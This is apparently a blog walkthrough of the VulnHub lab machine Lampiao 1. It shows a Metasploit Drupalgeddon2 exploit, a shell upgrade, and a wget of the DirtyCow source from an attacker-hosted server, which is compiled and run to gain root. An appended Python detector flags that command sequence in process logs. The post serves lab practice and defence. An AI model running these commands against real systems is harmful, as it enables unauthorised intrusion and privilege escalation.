Introduction
In this post, you will learn how to CTF the Lampiao 1 box from VulnHub. The post is also available in video format.
To download Lampiao 1 [Click here]
Hacking Phases in Lampiao
- Finding Target IP
- Nmap Scan
- Enumeration
- Exploit (msfconsole)
- Privesc
- Root
Let’s start
Finding Target IP
To find the target IP, let's use the command below, or you can go with the netdiscover command.
sudo arp-scan -l
In my case the target IP is 192.168.65.33
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.09.27-PM-1024x307.webp)
Nmap
I have done a full port scan and OS and service scan.
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.25.07-PM-1024x720.webp)
We can see that three ports are open: 22, 80 and 1898. Port 1898 runs Drupal.
So, let's open port 1898 in the browser.
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.32.46-PM-1024x619.webp)
So, it's powered by Drupal and its version is 7. We learned the version from the nmap scan.
So I thought of exploiting it by using the drupal_drupalgeddon2 exploit.
Exploit
So, let’s exploit the target using msfconsole.
```
use unix/webapp/drupal_drupalgeddon2
set rhost 192.168.65.33
set rport 1898
exploit
```
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.36.33-PM-1024x366.webp)
We have got access.
```
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
```
The last command checks the OS release of the target.
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.38.18-PM.webp)
Privesc
We have finally found the exploit that we were looking for and we have downloaded it on our machine.
Download the exploit
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.40.39-PM-1024x540.webp)
Now let's upload the exploit to the target machine. Let's start the Python HTTP server.
python -m http.server 80
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.44.56-PM-1024x282.webp)
```
wget http://<kali IP>/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow
su    # password: dirtyCowFun
```
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-3.02.04-PM.webp)
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-3.02.12-PM.webp)
Finally got the flag ❤️
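From the defender's side, the commands used in this walkthrough leave a recognisable trail when process executions are logged for the web server account. The following is an added example, not part of the original post: the log format, the `www-data` account name, the rule names and the threshold are all assumptions, and the sample records are constructed.

```python
import re

# Constructed process-execution records (log format is an assumption).
SAMPLE_LOG = """\
13:36:40 user=www-data cmd=python -c 'import pty;pty.spawn("/bin/bash")'
13:38:18 user=www-data cmd=lsb_release -a
13:45:02 user=www-data cmd=wget http://192.0.2.10/40847.cpp
13:45:30 user=www-data cmd=g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
13:45:41 user=www-data cmd=./dcow
13:46:05 user=www-data cmd=su
09:00:00 user=deploy cmd=g++ -O2 -o app main.cpp
09:01:00 user=www-data cmd=php cron.php
"""

LINE_RE = re.compile(r"^(\S+) user=(\S+) cmd=(.+)$")
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}  # assumed web server accounts
COMPILERS = {"gcc", "g++", "cc", "clang", "clang++", "make"}

def classify(cmd):
    """Return the names of the rules a command line matches."""
    argv = cmd.split()
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]  # program name without its directory
    hits = []
    if "pty.spawn" in cmd:             # interactive TTY upgrade from a web shell
        hits.append("tty_upgrade")
    if prog in {"wget", "curl"} and re.search(r"\.(c|cc|cpp)(\s|$)", cmd):
        hits.append("source_download") # fetching C/C++ source onto the host
    if prog in COMPILERS:
        hits.append("compiler")        # a web account has no reason to compile
    if argv[0].startswith("./"):
        hits.append("run_from_cwd")    # running a binary from the working directory
    if prog in {"su", "sudo"}:
        hits.append("switch_user")
    return hits

def detect(log, accounts=SERVICE_ACCOUNTS, threshold=3):
    """Return service accounts whose executions match >= threshold distinct rules."""
    hits = {}
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group(2) in accounts:
            for rule in classify(m.group(3)):
                hits.setdefault(m.group(2), []).append((m.group(1), rule))
    return {u: h for u, h in hits.items() if len({r for _, r in h}) >= threshold}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

Requiring several distinct rules before alerting keeps a single legitimate compiler or `su` call from firing on its own.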
Conclusion
In my opinion, I would rate it 1.5 out of 10, and it's really a great box. You can learn some privilege escalation stuff. See you in the next post guys ❤️